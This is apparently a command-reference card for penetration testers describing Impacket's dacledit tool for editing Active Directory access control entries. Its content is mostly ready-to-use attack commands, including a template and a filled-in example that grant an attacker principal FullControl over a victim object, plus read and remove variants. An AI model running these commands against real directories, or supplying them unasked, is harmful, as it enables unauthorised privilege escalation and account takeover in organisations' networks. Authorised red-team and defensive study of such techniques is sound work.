Impacket dacledit.py

Read, write, or remove DACL ACEs on AD objects from Linux. Use to grant yourself GenericAll/WriteDacl over a target user, group, or computer once you have an ACL-write primitive.

Tool
impacket-dacledit
Category
Privilege Escalation / ACL / DACL Abuse
Platform
linux
Requires
password
Protocols
LDAP

Open in Command Manager

Syntax

Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.

impacket-dacledit -action write -rights FullControl -principal '<attacker>' -target '<victim>' '<domain>/<user>:<password>'

Credential variants

The same attack using a different authentication material.

Read DACL requires password

impacket-dacledit -action read -target '<victim>' '<domain>/<user>:<password>'

Remove ACE requires password

impacket-dacledit -action remove -rights FullControl -principal '<attacker>' -target '<victim>' '<domain>/<user>:<password>'

Examples

impacket-dacledit -action write -rights FullControl -principal jdoe -target itadmin corp.local/jdoe:'Password123!'

Tags

impacket dacledit acl dacl privilege-escalation

References